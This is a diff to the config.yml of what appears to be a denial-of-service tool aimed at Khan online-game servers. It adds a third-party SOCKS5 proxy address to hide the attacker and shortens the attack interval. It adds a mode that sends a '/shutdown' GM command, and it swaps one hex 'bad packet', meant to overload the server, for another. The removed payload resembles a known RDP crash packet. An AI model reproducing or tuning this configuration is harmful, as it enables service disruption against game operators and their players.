--- a/config.yml
+++ b/config.yml
@@ -2,6 +2,11 @@
 # True  = copy GameData.bin and KhanClient.exe to this folder from khan folder. 
 use_client_version : false
 
+# Leave empty if you won't use a proxy
+# Set to a SOCKS5 proxy if you want to use a proxy.
+# http://www.gatherproxy.com/sockslist/country/?c=Thailand
+proxy : 61.7.228.51:1080
+
 # This is the ip:port of the balancing server NOT THE GATE.
 # To get the balancing ip:port open the KhanClient.exe with a hex editor and look for the domain/ip.
 # The default port is 2112.
@@ -17,12 +22,21 @@ game_upgrade_version : 13
 game_data_version    : 515
 
 # Attack wait time. (seconds)
-wait : 30
+wait : 5
+
+# attack type 
+# 0 = bad packet
+# 1 = gm command
+attack_mode : 0
 
 # This will be the packet/payload to overload the server with
-bad_packet : 03 00 00 13 0e e0 00 00 00 00 00 01 00 08 00 00 00 00 00 03 00 00 6a 02 f0 80 7f 65 82 00 5e 04 01 01 04 01 01 01 01 ff 30 19 02 01 ff 02 01 ff 02 01 00 02 01 01 02 01 00 02 01 01 02 02 00 7c 02 01 02 30 19 02 01 ff 02 01 ff 02 01 00 02 01 01 02 01 00 02 01 01 02 02 00 7c 02 01 02 30 19 02 01 ff 02 01 ff 02 01 00 02 01 01 02 01 00 02 01 01 02 02 00 7c 02 01 02 04 82 00 00 03 00 00 08 02 f0 80 28 03 00 00 08 02 f0 80 28 03 00 00 08 02 f0 80 28 03 00 00 08 02 f0 80 28 03 00 00 08 02 f0 80 28 03 00 00 08 02 f0 80 28 03 00 00 08 02 f0 80 28 03 00 00 08 02 f0 80 28 03 00 00 0c 02 f0 80 38 00 06 03 f0 03 00 00 09 02 f0 80 21 80
+bad_packet : 05 00 00 00 00 00 00 00 00
+
+# this will be the gm command to be sent to the server
+gm_command : /shutdown
 
 # for dev
 # env GOOS=windows GOARCH=386 go build -i -o khxn32.exe main.go
 # go build -i -o khxn.exe main.go
-debug : false
+debug   : false
+verbose : false
